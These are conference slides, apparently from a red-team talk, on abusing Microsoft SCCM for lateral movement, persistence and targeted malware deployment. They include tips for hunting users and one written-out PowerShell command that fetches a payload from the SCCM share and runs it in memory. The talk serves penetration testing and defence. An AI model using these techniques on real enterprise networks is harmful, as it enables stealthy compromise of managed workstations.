red team upgrades using sccm for malware deployment
TRANSCRIPT
Red Team Upgrades: Using SCCM for Malware Deployment
@enigma0x3
❖ Penetration Tester and Red Teamer for the Adaptive Threat Division (ATD) of Veris Group
❖ Active developer on the PowerShell Empire project❖ Offensive PowerShell advocate❖ 2nd time speaking!❖ This con is probably older than I am❖ Indiana corn farmer turned h4x0r (not really)
❖ What is SCCM and how some admins fail at securing it
❖ Ways to abuse Microsoft’s System Center Configuration Manager (SCCM) for targeted network compromise.➢ I’m going to cover targeted, strategic use as opposed to mass
pwnage
What this is...
Setting the Stage
❖ This talk assumes you have RDP access to a SCCM server
❖ This talk is focused on abusing SCCM for lateral movement/persistence in a targeted manner, not obtaining access to SCCM.
❖ No, having access to SCCM does not mean you own the enterprise
❖ If you administer SCCM as a domain admin, you fail.
What is SCCM?
❖ Platform for distributing packages/applications to clients
❖ Packages, applications and install scripts are hosted on the SCCM server
❖ Setup and maintained via an agent/server architecture
❖ Consists of a central site server with distribution points.➢ Agents check in to server periodically to obtain new
packages/applications
❖ Basically acts as internal RAT/C2
SCCM in the enterprise
❖ 1 central site server with multiple distribution points
❖ Typically managed via controlled groups➢ e.g. “SCCM Admins” in AD
❖ Typically setup/configured using a service account to run the application/push updates
❖ Application contents (*cough, cough install scripts and notes*) are hosted on a publicly available share
❖ Admins gonna admin
Right Click Tools
❖ Add-On that can be installed to assist in client management tasks
❖ Should be installed on a client such as an administrative workstation...not on the server➢ Admins install it on the server anyways
❖ Enables full control of managed endpoints
Yep...
Why use SCCM in Red Teaming?
❖ Manages a ton of distributed clients➢ Take control of the server and you have distributed workstation
control
➢ SCCM agents are just waiting to run your code
❖ Live off of the land➢ Keep your malicious implant count low, use SCCM for very
targeted implant distribution
➢ Looks like normal day-to-day traffic/activity
➢ To limit the risk of getting caught, become an admin and not a typical adversary
Why use SCCM in Red Teaming? (cont)
❖ Allows you to identify and strategically group targets➢ Able to push implants out in a very controlled and surgical
manner
❖ Also acts as a persistence mechanism
Abusing SCCM: Hunting
❖ Some organizations have user->device mapping➢ This allows for admins to create specific groups for departments
❖ We can abuse this to hunt for specific users without generating any additional network/domain traffic
Abusing SCCM: Compromise
❖ Create an application/package that utilizes PowerShell for payload delivery and execution
❖ Do so by creating a PowerShell payload and throw it up on the public share SCCM uses (typically something like sccmsource)
Abusing SCCM: Compromise
❖ Create a script installer application to fetch and execute your payload➢ cmd.exe /c “powershell.exe -c “gc \\serverName\
sharedFolder\ApplicationFolder\payload.txt | iex””
❖ Deploy the application to your target group and wait for the SCCM agents to check in➢ Payload is fetched over UNC and runs in memory
❖ More here:➢ https://enigma0x3.wordpress.com/2015/10/27/targeted-worksta
tion-compromise-with-sccm/
Questions and Contact
❖ Feel free to hit me up!❖ enigma0x3 [at] gmail [dot] com❖ @enigma0x3 on Twitter and Github❖ enigma0x3 on Freenode: #psempire❖ Blog: enigma0x3.wordpress.com
References
❖ https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf
❖ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-compromise-with-sccm/